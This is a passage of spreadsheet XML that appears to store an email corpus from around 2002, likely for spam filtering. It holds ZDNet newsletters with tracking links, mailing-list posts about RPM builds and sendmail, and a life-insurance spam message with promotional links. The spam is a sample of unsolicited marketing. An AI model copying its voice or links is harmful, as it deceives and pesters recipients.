 &lt;a href="http://clickthru.online.com/Click?q=ed-jLlvQgVq7S6yZ0Rxv3orMjEsaQPR" &gt;
 &lt;b&gt;Read the full story&lt;/b&gt;&lt;/a&gt;
 &lt;br&gt;
 &lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=02-qia9Ilj8-SNwlL-_XGuwrfzJ6nnR" &gt;
 &lt;b&gt;Also: Ellison shrugs a No. 2 exec&lt;/b&gt;&lt;/a&gt;
 &lt;P&gt;
 &lt;!-- STORY 3 --&gt;
 &lt;font size="+1"&gt;&lt;b&gt;Standards stalled over royalty disputes&lt;/b&gt;&lt;/a&gt;&lt;/font&gt;&lt;br&gt;
 The &lt;b&gt;World Wide Web Consortium&lt;/b&gt; is bracing for a vote next week that could decide once and for all how the standards body will handle patented technology that comes with royalties attached. If patented technology is rejected, the vote could mark a major shift in the Internet standards battle. Major intellectual property holders such as &lt;b&gt;Microsoft&lt;/b&gt; and &lt;b&gt;IBM&lt;/b&gt; have a lot at stake.
 &lt;br&gt;&lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=17-agitI5XrfGdJ4KnIz4s1RhjGRseR" &gt;
 &lt;b&gt;Read the full story&lt;/b&gt;&lt;/a&gt;
 &lt;br&gt;
 &lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=2c-DatOIc0D7TNt2KHc-r7MBvWpjuyR" &gt;
 &lt;b&gt;Microsoft's OpenGL claim shakes graphics world&lt;/b&gt;&lt;/a&gt;
 &lt;p&gt;
 &lt;!--STORY 4--&gt;
 &lt;font size="+1"&gt;&lt;b&gt;Survey: Execs rethinking IT budgets&lt;/b&gt;&lt;/a&gt;&lt;/font&gt;&lt;br&gt;
 Growing numbers of &lt;b&gt;Fortune 1000 CIOs&lt;/b&gt; are re-evaluating their IT budgets and spending plans for coming months, according to a recent survey. Morgan Stanley finds that CIOs' top priorities include security software, application integration and Windows 2000/XP upgrades for the desktop. &lt;b&gt;Integration challenges&lt;/b&gt; were slowing the rate of application adoption for 38 percent of those surveyed.
 &lt;br&gt;&lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=41-qqJ1IEKImbO8L8fU5CfCkxHB0FFR" &gt;
 &lt;b&gt;Read more survey results&lt;/b&gt;&lt;/a&gt;
 &lt;p&gt;
 &lt;!--STORY 5--&gt;
 &lt;font size="+1"&gt;&lt;b&gt;Oh look, a new bug in Outlook and IE&lt;/b&gt;&lt;/a&gt;&lt;/font&gt;&lt;br&gt;
 A Danish security expert has warned of a security flaw in &lt;b&gt;Microsoft's ActiveX&lt;/b&gt; scripting component that allows network attackers to peek at cookies, read files and even run programs on a victim's PC. The expert recommended that users disable ActiveX in IE and Outlook, at least until Microsoft releases a patch.
 &lt;br&gt;&lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=57-YJIXII04Fxty6t1F0F_wt9Q9dZuR" &gt;
 &lt;b&gt;Read the full story&lt;/b&gt;&lt;/a&gt;
 &lt;br&gt;&lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=6c-SUL3IuPjjfx28t3KQCL5-NPyEdsR" &gt;
 &lt;b&gt;Also: Outlook plug-in opens PCs to hackers&lt;/b&gt;&lt;/a&gt;
 &lt;p&gt;
 &lt;!-- story 6 --&gt;
 &lt;!--&lt;font size="+1"&gt;&lt;b&gt;Cell phone personality test&lt;/b&gt;&lt;/a&gt;&lt;/font&gt;&lt;br&gt;
 Whether you're a total gear head or you like to keep things simple, 
 take our cell phone personality test to find out which models suit you best.
 &lt;br&gt;&lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=81-z1IaQ-KBr98tuoSpqfRO9R6BpKlR" &gt;
 &lt;b&gt;Read the full story&lt;/b&gt;&lt;/a&gt;
 &lt;br&gt;&lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=96-pjdWQtduMsDdkmnjZWSoS2P4Jm4R" &gt;
 &lt;b&gt;David Berlind's Rx for mobile happiness&lt;/b&gt;&lt;/a&gt;
 &lt;p&gt;--&gt;
 &lt;!-- Write to me --&gt;
 &lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;Write me at &lt;a href="mailto:dan.farber@cnet.com"&gt;&lt;b&gt;dan.farber@cnet.com&lt;/b&gt;&lt;/a&gt;&lt;br&gt;&lt;br&gt;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href="http://clickthru.online.com/Click?q=ab-ZcQKQYpdYihKetPXydit0M-0OvrR"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href="http://clickthru.online.com/Click?q=c2-oXxLQUEk7XhEm4lgVnxXFZcIuInR" &gt;"Embedded XP isn't the remedy."&lt;/a&gt;&lt;/b&gt;&lt;/a&gt;&lt;/font&gt;&lt;br&gt;
 &lt;br&gt;&lt;br&gt;
 &lt;/font&gt;  &lt;/td&gt;
         &lt;/tr&gt;&lt;/table&gt;
 --&gt;
 &lt;!--end quote block--&gt;
         &lt;!-- review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href="http://clickthru.online.com/Click?q=d7-wk3ZQLWkVXvnkgFRmBekeVktk2eR" &gt;
 &lt;b&gt;Mixing Unix and Windows&lt;/b&gt;&lt;/a&gt;&lt;/font&gt;&lt;br&gt;
 Most enterprises have a mix of Windows and Unix systems. &lt;b&gt;Larry Seltzer&lt;/b&gt; explores the options for interoperating those systems.
  &lt;br&gt;&lt;br&gt;
         &lt;/font&gt;&lt;/td&gt;
         &lt;/tr&gt;&lt;/table&gt;
         &lt;!-- feature --&gt;
 &lt;font face="verdana, geneva" color="#666666" size="-2"&gt;&lt;b&gt;Q&amp;A&lt;/b&gt;&lt;/font&gt;&lt;sub&gt;&amp;nbsp;&lt;/sub&gt;&lt;br&gt;
 &lt;table width="100%" cellpadding="0" cellspacing="0" border="0"&gt;&lt;tr&gt;
 &lt;td width="20"&gt;&lt;img src="http://www.zdnet.com/b.gif" width="20" height="1"&gt;&lt;/td&gt;
 &lt;td width="100%"&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 &lt;font size="+0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=ec-MHyXQVy2A7hthl11kOqFb2GVaGyR" &gt;
 &lt;b&gt;Marcelo Tosatti: The future is Linux&lt;/b&gt;&lt;/a&gt;&lt;/font&gt;&lt;br&gt;
 The maintainer of the Linux kernel talks about new opportunities, defends &lt;b&gt;UnitedLinux&lt;/b&gt; and tells why copyright laws keep him from entering the U.S.
  &lt;br&gt;&lt;br&gt;
         &lt;/font&gt;&lt;/td&gt;
         &lt;/tr&gt;&lt;/table&gt;
 		        &lt;!-- download --&gt;
         &lt;!-- /coming tomorrow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href="http://clickthru.online.com/Click?q=01-9oXDI2jHgIC2jlXvurMPGPxZ6RlR" &gt;
 &lt;b&gt;ROI calculators don't tell the whole TCO story&lt;/b&gt;&lt;/a&gt;&lt;/font&gt;&lt;br&gt;
 In response to &lt;b&gt;David Berlind's&lt;/b&gt; "&lt;a href="http://clickthru.online.com/Click?q=16-T_cjI4cFVqysbfpDblRuaBDxRU4R" &gt;&lt;b&gt;Dell's formula for ROI&lt;/b&gt;&lt;/a&gt;," TCO
 consultant &lt;b&gt;Tom Rankin&lt;/b&gt; warns that "99 percent of TCO tools do
 not look at the 'total' but may look at whatever parameters
 suit the vendor to sell their products/services."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size="-2"&gt;&lt;b&gt;Networking&lt;/b&gt;&lt;/font&gt;&lt;br /&gt;&lt;img src="http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" height=3 width=1&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;
 	&lt;tr valign="top"&gt;
 	&lt;td width="85"&gt;&lt;a href="http://clickthru.online.com/Click?q=2b-2FVYINzsBDmkMkLwzk0xBfd-8WrR" &gt;&lt;img src="http://www.zdnet.com/products/graphics/052302gateway.jpg" width="85" height="110" border="0" alt="" /&gt;&lt;/a&gt;&lt;/td&gt;
 	&lt;td width="5"&gt;&lt;img src="http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" height=1 width=5&gt;&lt;/td&gt;
 	&lt;td width="100%"&gt;&lt;font face="arial, helvetica" size="-1"&gt;&lt;a href="http://clickthru.online.com/Click?q=40-6Pp4Idn8DzSZe6FeVXCHnpqL0wRR" style="text-decoration:none"&gt;&lt;b&gt;Find the right home network&lt;/b&gt;&lt;/a&gt; &lt;br /&gt;Choosing the right technology to match your networking needs is vital. Here's help in making the choice.&lt;/font&gt;&lt;/td&gt;
 	&lt;/tr&gt;
 	&lt;tr&gt;&lt;td colspan="3"&gt;&lt;img src="http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" height=3 width=1&gt;&lt;br /&gt;&lt;img src="http://techupdate.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0" alt="" /&gt;&lt;font face="arial, helvetica" size="-1"&gt;&lt;a href="http://clickthru.online.com/Click?q=55-TAHaIKJ8XqZjyrlqm86ccJ_2d2ZR" style="text-decoration:none"&gt;Read reviews&lt;/a&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;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&lt;b&gt;Networking&lt;/b&gt;&lt;br /&gt;&lt;img src="http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" width="1" height="7" alt="" border="0" /&gt;&lt;br /&gt;
 	&lt;b&gt;1&lt;/b&gt;. &lt;a href="http://clickthru.online.com/Click?q=6a-z_30IeWiUkdC9FIzceCGFySNP8dR" style="text-decoration:none"&gt;Linksys EtherFast wireless AP&lt;/a&gt;&lt;br /&gt;&lt;img src="http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
 	&lt;b&gt;2&lt;/b&gt;. &lt;a href="http://clickthru.online.com/Click?q=80-KTKvQQ0Kirz33VHoaDkjVsTLZ8iR" style="text-decoration:none"&gt;Linksys EtherFast router&lt;/a&gt;&lt;br /&gt;&lt;img src="http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
 	&lt;b&gt;3&lt;/b&gt;. &lt;a href="http://clickthru.online.com/Click?q=95-XdwrQvdJorT95eDr1yZeU_u_KnPR" style="text-decoration:none"&gt;Siemens SpeedStream router&lt;/a&gt;&lt;br /&gt;&lt;img src="http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
 	&lt;b&gt;4&lt;/b&gt;. &lt;a href="http://clickthru.online.com/Click?q=aa-gBteQXUr2M_s2L9WLXZBXqONOVnR" style="text-decoration:none"&gt;Wireless 802.11B Router&lt;/a&gt;&lt;br /&gt;&lt;img src="http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
 	&lt;b&gt;5&lt;/b&gt;. &lt;a href="http://clickthru.online.com/Click?q=bf-JtRfQ8ZrsdYUGDe5w8PF_jEuwteR" style="text-decoration:none"&gt;NetGear HE102 802.11a wireless AP&lt;/a&gt;&lt;br /&gt;&lt;img src="http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" width="1" height="6" alt="" border="0" /&gt;&lt;br /&gt;
 	&lt;img src="http://techupdate.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0" alt="" /&gt;&lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=d4-E0SqQ0ExfloN066_4Mc3148lk6yR" &gt;More popular networking products&lt;/a&gt;&lt;/b&gt;&lt;br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href="http://clickthru.online.com/Click?q=e9-gdzpQxVzOsKMP8VTRnU3P83P5XlR" &gt;Veritas CEO Gary Bloom speaks out at Tech Update.&lt;/A&gt; &lt;P&gt; &lt;a href="http://clickthru.online.com/Click?q=fe-xkIgQwgwyCc9UcJeE4rbg6amtI4R" &gt;Check out these personal laser printer picks at ZDNet Reviews.&lt;/A&gt; &lt;P&gt; &lt;a href="http://clickthru.online.com/Click?q=13-NxSZI3XWrkeRFchssDLfzpHOCerR" &gt;See how WAP works and how you should use it at Builder.com.&lt;/A&gt; &lt;P&gt; &lt;a href="http://clickthru.online.com/Click?q=28-A2wXIRd4OHpB2c4EL2t1VlTK8yiR" &gt;Need a new job? Find one today in ZDNet's Career Center.&lt;/A&gt; &lt;P&gt; &lt;a href="http://clickthru.online.com/Click?q=3e-F51nIizXe2hvu55_7DQESNPe-i4R" &gt;CIOs talk out about the future of IT at CNET News.com.&lt;/A&gt;&lt;/b&gt;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href='http://clickthru.online.com/Click?q=53-n8WdzBn2B4NM-pRiHAvr_q0xI45rEdRR'&gt;Unsubscribe&lt;/a&gt;&amp;nbsp;| 
         &amp;nbsp;&lt;a href='http://nl.com.com/servlet/url_login?email=qqqqqqqqqq-zdnet@example.com&amp;brand=zdnet'&gt;Manage 
         My Subscriptions&lt;/a&gt;&amp;nbsp;|&amp;nbsp;&lt;a href="http://clickthru.online.com/Click?q=68-iM8qIsPPhLFxMx8ywvjsK-FdLPRR" &gt;FAQ&lt;/A&gt;&amp;nbsp;| 
         &amp;nbsp;&lt;a href="http://clickthru.online.com/Click?q=7d-FFEqIDLPdjqsXIiUywq2NRJSBTZR"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href="http://clickthru.online.com/Click?q=92-ubRVQTzTtq5_hCozeFOPq1FsnynR" &gt;&lt;img src="http://www.zdnet.com/graphics/newsletters/gl_ft.gif" width=75 height=43 border=0 alt="ZDNet"&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;td width=525&gt;&lt;font face="arial, helvetica" size="-2" color="#ffffff"&gt;&lt;a href="http://clickthru.online.com/Click?q=a7-fR_2Q8BwDGT79pGLF5vLk7KCgFeR" style="color: #fff"&gt;Home&lt;/a&gt; |&lt;a href="http://clickthru.online.com/Click?q=bc-zkPJQ6Bdhi5rkcQmobF8XEDxwcyR" style="color: #fff"&gt;eBusiness&lt;/a&gt; | &lt;a href="http://clickthru.online.com/Click?q=d2-THo_QULwlGzX3e03Gl22vbAOyenR" style="color: #fff"&gt;Security&lt;/a&gt; | &lt;a href="http://clickthru.online.com/Click?q=e7-2y-GQmVXfHpzCKWVqS8CMB0qvseR" style="color: #fff"&gt;Networking&lt;/a&gt; | &lt;a href="http://clickthru.online.com/Click?q=fc-WpHmQVwF4FdE4pya9-0t3VVat9yR" style="color: #fff"&gt;Applications&lt;/a&gt; | &lt;a href="http://clickthru.online.com/Click?q=11-l8riI2-4W8coppGX3VynhNBuCqlR" style="color: #fff"&gt;Platforms&lt;/a&gt; | &lt;a href="http://clickthru.online.com/Click?q=26-KqPVIiMHferEsYZBBBkqU8niQ74R" style="color: #fff"&gt;Hardware&lt;/a&gt; | &lt;a href="http://clickthru.online.com/Click?q=3b-XhxVINdHJgKMLEPFPcZsjpRp-LrR"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src="http://gserv.zdnet.com/clear/outbound.gif?APPID=2&amp;EMID=25136482&amp;NL=e539&amp;ISSUE=2002-07-12" height=1 width=1&gt;    &lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;  &lt;td colspan=2&gt;&lt;font face=Arial, Helvetica, sans-serif size=2&gt;    &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;!-- /footer --&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 &lt;IMG HEIGHT=1 WIDTH=1 SRC="http://clickthru.online.com/Click?q=50-M_6Bns0jgu_i3lf5G5ysjtTgzRRR"&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Toners and inkjet cartridges for less....                     CUN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</si>
  <si>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jstaddon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</si>
  <si>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these are being advertised all over the UK/ Chief come-on seems to be to the 
 same people who use phones for text messaging--i.e. teenagers. "Hi, we're at 
 the beach and I met this awesome guy--here's his pic"
 Tom
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Clinton: Blair's the man to trust
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/215,1,215/
 Date: 2002-10-03T04:21:06+01:00
 Bill Clinton uses his Labour conference speech to urge George Bush to persevere 
 with the UN.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: $250,000... as low as $6.50 per month.             edahx
</t>
  </si>
  <si>
    <t xml:space="preserve">When America's top companies compete for your business, you win.
 In today's world, it's important to expect the unexpected. When preparing for the future, we must always consider our family. To plan for your family's future, the right life insurance policy is a necessity. But who wants to pay too much for life insurance? Let us help you find the right quote, quickly and easily...
 Compare your coverage...
 $250,000... as low as $6.50 per month.
 $500,000... as low as $9.50 per month.
 $1,000,000... as low as $15.50 per month.
 http://quotes.readyserve21.com/sure_quote/LF06-237600/
 Take a moment.
 Let us show you that we are here to save time, and money.
 Receive up to 15 quotes in seconds.
 http://quotes.readyserve21.com/sure_quote/LF06-237600/
 Click here to delete your address from future updates.
 http://quotes.readyserve21.com/sure_quote/rm/
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: xine src packge still gives errors
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi
 I try to rebuild xine from src package and I get these errors:
 .
 .
 .
 .
 .
 Finding  Provides: /usr/lib/rpm/find-provides
 Finding  Requires: /usr/lib/rpm/find-requires
 PreReq: rpmlib(PayloadFilesHavePrefix) &lt;= 4.0-1 
 rpmlib(CompressedFileNames) &lt;= 3.0.4-1
 Requires(rpmlib): rpmlib(PayloadFilesHavePrefix) &lt;= 4.0-1 
 rpmlib(CompressedFileNames) &lt;= 3.0.4-1
 Requires: xine-libs = 0.9.13 /bin/sh
 Obsoletes: xine-devel
 RPM build errors:
     user dude does not exist - using root
     user dude does not exist - using root
     user dude does not exist - using root
     user dude does not exist - using root
     user dude does not exist - using root
     File not found: /var/tmp/xine-root/usr/bin/aaxine
 thx,
 Roi
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">
 _x0011_ࡱ_x001a_ Worldwide*
 Great Restaurants, Shopping &amp; Activities
 FEMA #IL-0458 and ADA Compliant
 Contact Riz Bhatti @ 1847-677-1234 ext. 6884 or
 Donald Bae @ 1847-677-1234 ext. 6880
 Take a virtual tour of our hotel @ _x0013_ HYPERLINK "http://www.radisson-chicago.com" _x0001__x0014_www.radisson-chicago.com_x0015_
 December 2001 Customer Satisfaction Survey-Radisson Worldwide Hotels and Resorts
 _x0013_ EMBED MS_ClipArt_Gallery.5  _x0014__x0001__x0015_
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: RE: [Razor-users] Razor with sendmail
</t>
  </si>
  <si>
    <t xml:space="preserve">----- Original Message -----
 From: &lt;razor-users-request@example.sourceforge.net&gt;
 To: &lt;razor-users@example.sourceforge.net&gt;
 Sent: Friday, August 23, 2002 3:05 PM
 Subject: Razor-users digest, Vol 1 #346 - 8 msgs
 &gt; Subject: RE: [Razor-users] Razor with sendmail
 &gt; Date: Fri, 23 Aug 2002 15:03:05 -0400
 &gt; From: "Rose, Bobby" &lt;brose@med.wayne.edu&gt;
 &gt; To: "Julian Bond" &lt;julian_bond@voidstar.com&gt;,
 &gt; &lt;razor-users@lists.sourceforge.net&gt;
 &gt;
 &gt; If you didn't add it when compile would be one way.  Another would be to
 &gt; grep your sendmail.cf for the word Milter.
 &gt;
 &gt;
 &gt;
 &gt; "Bort, Paul" &lt;pbort@tmwsystems.com&gt; wrote:
 &gt; &gt;If your sendmail has been compiled with Milter support, you can add=20
 &gt; &gt;SMRazor easily. We've been using it for a while without problems.=20
 &gt; &gt;Others on the list have mentioned it as well.
 &gt; &gt;
 &gt; &gt;http://www.sapros.com/smrazor/
 &gt;
 &gt; Is there an easy way to tell if Milter is compiled in?
 &gt;
 To see all the options compiled into (and version of) sendmail, try the
 following line:
 echo \$Z | /path/to/sendmail -bt -d0
 Sven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</si>
  <si>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Shop smarter with ZDNet's price-feature analysis
</t>
  </si>
  <si>
    <t xml:space="preserve">--2063203.1026378321083.JavaMail.root.abv-sfo1-ac-agent1
 Content-Type: text/plain; charset=ISO-8859-1
 Content-Transfer-Encoding: 7bit
 -----------------------------------------------------------------
     ZDNET DELIVERS Price-Feature Analysis	Vol 1, No. 2
 -----------------------------------------------------------------
 This week, we present a special shopper report featuring
 four cool products. We have reviewed these products,
 compared each to five products with similar features,
 and analyzed the range of prices for each category. What
 you'll see is a shopper tool we've dubbed the "Price-Feature
 Ratio Analysis." Featured products can fall in to three
 stages of Price-Feature ratios:
 Stage 1: High Price-Feature Ratio - Technophiles will rush
 to buy the product, but can expect to pay higher prices
 for the honor of being the first among their friends to have one.
 Stage 2: Variable Price-Feature Ratio - Expect high variability
 in prices among products with similar features. It pays to
 comparison shop for the best price.
 Stage 3: Low Price-Feature Ratio - When compared to products
 with similar features, prices are low and don't vary much
 from merchant to merchant. Use our merchant ratings to
 find the right one for you.
 We have rated each of the products featured in this supplement
 to aid your shopping experience.
 ______________________________________________________________
 Featured Products
 1) Sound Blaster Extigy
 2) Handspring Treo 90
 3) KDS Rad-5 15-inch LCD
 4) Sony PlayStation 2
 ______________________________________________________________
 Sound Blaster Extigy sound convergence device
 The Lowdown: If you're into watching DVDs, listening to tunes,
 or recording music with your computer, you'd be doing yourself
 a favor by upgrading your sound with this convergence device.
 Read review:
 --
 http://chkpt.zdnet.com/chkpt/tedstest02t/http://www.zdnet.com/supercenter/stories/overview/0,12069,554219,00.html
 Price-Feature Ratio Analysis: This product is in Stage 2:
 Variable Price-Feature Ratio. You can expect high variability
 in prices among products with similar features. It pays to
 comparison shop for the best price.
 Check prices:
 --
 http://zdnetshopper.cnet.com/shopping/resellers/0-6928060-1411-8751383.html?tag=st.cr.mp.dpt.pr8751383
 ______________________________________________________________
 Handspring Treo 90 PDA
 The Lowdown: If you're not fond of Graffiti, this is an excellent
 alternative to other Palm OS handhelds.
 Read review:
 --
 http://chkpt.zdnet.com/chkpt/tedstest02t/http://www.zdnet.com/supercenter/stories/overview/0,12069,561635,00.html
 Price-Feature Ratio Analysis: This product is in Stage 1:
 High Price-Feature Ratio Technophiles will rush to buy the product,
 but can expect to pay higher prices for the honor of being the first
 among their friends to have one.
 Check prices:
 --
 http://zdnetshopper.cnet.com/shopping/resellers/0-7085-1411-9946796.html?tag=st.cr.mp.dpt.pr9946796
 ______________________________________________________________
 KDS Rad-5 15-inch LCD
 The Lowdown: Without our even hitting the power button, the
 stylish KDS Radius Rad-5 stands out from the pack with its
 silver casing and blue highlights. Turn on this basic,
 analog-only LCD and you'll see an equally impressive image
 at its native resolution of 1,024x768.
 Read review:
 --
 http://chkpt.zdnet.com/chkpt/tedstest02t/http://www.zdnet.com/supercenter/stories/overview/0,12069,519801,00.html
 Price-Feature Ratio Analysis: This product is in Stage 2:
 Variable Price-Feature Ratio. You can expect high variability
 in prices among products with similar features. It pays to
 comparison shop for the best price.
 Check prices:
 --
 http://zdnetshopper.cnet.com/shopping/resellers/0-11600-1411-5609413.html?tag=st.cr.mp.dpt.pr5609413
 ______________________________________________________________
 Sony PlayStation 2
 The Lowdown: The elder statesman of next-generation consoles,
 the PS2, now priced below $200, has the luxury of a year's
 head start and many solid games.
 Read review:
 --
 http://chkpt.zdnet.com/chkpt/tedstest02t/http://www.zdnet.com/supercenter/stories/overview/0,12069,133000,00.html
 Price-Feature Ratio Analysis: This product is at Stage 3:
 Low Price-Feature Ratio. When compared to products with similar
 features, prices are low and don't vary much from merchant
 to merchant. Use our merchant ratings to find the right one
 for you.
 Check prices:
 --
 http://zdnetshopper.cnet.com/shopping/resellers/0-11600-1411-7932420.html?tag=st.cr.mp.dpt.pr7932420
 *************************************************************
 The e-mail address for your subscription is qqqqqqqqqq-zdnet@spamassassin.taint.org
 To sign up for more ZDNet newsletters, click here:
 NOTRACK
 http://nl.com.com/servlet/url_login?email=qqqqqqqqqq-zdnet@spamassassin.taint.org&amp;brand=zdnet
 To unsubscribe, click here:
 http://clickthru.online.com/Click?q=0d-3aouzKr6RGL1qjtct6wKrYAq6gViidRR
 To receive your newsletter in HTML format, click here:
 NOTRACK
 http://nl.com.com/servlet/url_login?email=qqqqqqqqqq-zdnet@spamassassin.taint.org&amp;brand=zdnet
 For the ZDNet Newsletters FAQ, click here:
 http://www.zdnet.com/filters/email/faq/
 To learn about advertising opportunities in ZDNet Newsletters, click
 here: http://www.cnet.com/aboutcnet/0-13618.html?tag=ft
 &lt;tr:ad name="copyright" /&gt;
 --2063203.1026378321083.JavaMail.root.abv-sfo1-ac-agent1
 Content-Type: text/html; charset=ISO-8859-1
 Content-Transfer-Encoding: 7bit
 subj: Shop smarter with ZDNet's price-feature analysis
 &lt;html&gt;
 &lt;head&gt;
 &lt;title&gt;ZDNet Delivers&lt;/title&gt;
 &lt;body style="margin:8px 9px 9px 12px" bgcolor="#ffffff" background="http://techupdate.zdnet.com/techupdate/i/bg_232850.gif" link="#003399" alink="#cc0000" vlink="#003399"&gt; 
 &lt;div align="center"&gt;
 &lt;!-- header --&gt;
 &lt;a name="top"&gt;&lt;/a&gt; 
 &lt;table bgcolor="#232850" border="0" cellpadding="0" cellspacing="0" width="624"&gt;&lt;tbody&gt;
 &lt;tr valign="bottom"&gt;&lt;td width="624"&gt;&lt;img alt="" height="53" src="http://image.com.com/graphics/newsletters/hd_deliver.gif" width="624" /&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/tbody&gt;&lt;/table&gt;
 &lt;table width="624" border="0" cellspacing="0" cellpadding="0"&gt;&lt;tbody&gt;
 &lt;tr&gt;
 &lt;td width="1" rowspan="2" bgcolor="#83A3CB"&gt;&lt;img src="http://www.zdnet.com/b.gif" width="1" height="7" alt="" /&gt;&lt;br /&gt;&lt;/td&gt;
 &lt;td width="622" height="6" colspan="3" bgcolor="#1E5C99"&gt;&lt;img alt="" src="http://www.zdnet.com/b.gif" width="1" height="6" /&gt;&lt;br /&gt;&lt;/td&gt;
 &lt;td width="1" rowspan="2" bgcolor="#83A3CB"&gt;&lt;img alt="" src="http://www.zdnet.com/b.gif" width="1" height="7" /&gt;&lt;br /&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td width="10" height="1" bgcolor="#1E5C99"&gt;&lt;img src="http://www.zdnet.com/b.gif" width="10" height="1" alt="" /&gt;&lt;br /&gt;&lt;/td&gt;
 &lt;td width="600" height="1" bgcolor="#000000"&gt;&lt;img src="http://www.zdnet.com/b.gif" width="600" height="1" alt="" /&gt;&lt;br /&gt;&lt;/td&gt;
 &lt;td width="10" height="1" bgcolor="#1E5C99"&gt;&lt;img src="http://www.zdnet.com/b.gif" width="10" height="1" alt="" /&gt;&lt;br /&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;/tbody&gt;&lt;/table&gt;
 &lt;!-- /header --&gt;
 &lt;!-- main --&gt;
 &lt;table bgcolor="#ffffff" border="0" cellpadding="0" cellspacing="0" width="624"&gt;&lt;tbody&gt;&lt;tr&gt;
 &lt;td bgcolor="#83a3cb" width="1"&gt;&lt;img alt="" height="1" src="http://www.zdnet.com/b.gif" width="1" /&gt;&lt;/td&gt;
 &lt;td bgcolor="#1e5c99" width="10"&gt;&lt;img alt="" height="1" src="http://www.zdnet.com/b.gif" width="10" /&gt;&lt;/td&gt;
 &lt;td bgcolor="#000000" width="1"&gt;&lt;img alt="" height="1" src="http://www.zdnet.com/b.gif" width="1" /&gt;&lt;/td&gt;
 &lt;td width="10"&gt;&lt;img alt="" height="1" src="http://www.zdnet.com/b.gif" width="10" /&gt;&lt;/td&gt;
 &lt;td width="580"&gt;&lt;div align="center"&gt;
 &lt;img alt="" src="i/dots578.gif" width="578" height="1" vspace="10" /&gt;&lt;br /&gt;
 &lt;img src="http://www.zdnet.com/products/photogallery/header_analysis.gif" alt="ZDNet Shopper Analysis Supplement" width="394" height="19" border="0" /&gt;&lt;br /&gt;
 &lt;img alt="" src="i/dots578.gif" width="578" height="1" vspace="10" /&gt;
 &lt;/div&gt;
         &lt;table border="0" cellpadding="0" cellspacing="0" width="580"&gt;
         &lt;tr valign="top"&gt;
         &lt;td width="280"&gt;
                 &lt;!-- 1 --&gt;
                 &lt;img src="http://shopper.cnet.com/i/sh/zd/02/title_1.gif" alt="Sound Blaster Extigy" width="280" height="35" border="0" /&gt;&lt;br /&gt;
                 &lt;div align="center"&gt;	
 				&lt;a href="http://chkpt.zdnet.com/chkpt/tedstest02/http://www.zdnet.com/supercenter/stories/overview/0,12069,554219,00.html"&gt;&lt;img src="http://shopper.cnet.com/i/sh/zd/02/img_extigy.jpg" alt="Sound Blaster Extigy" width="280" height="180" border="0" /&gt;&lt;/a&gt;&lt;/div&gt;
                 &lt;font face="ms sans serif" size="-2"&gt;&lt;div align="center" style="padding-top:8px; padding-bottom:8px"&gt;&lt;img src="http://www.cnet.com/b.gif" width="8" height="5" border="0" alt="" /&gt;&lt;/div&gt;
                 &lt;b&gt;The Lowdown:&lt;/b&gt;  If you're into watching DVDs, listening to tunes, or recording music with your computer, you'd be doing yourself a favor by upgrading your sound with this convergence device. 
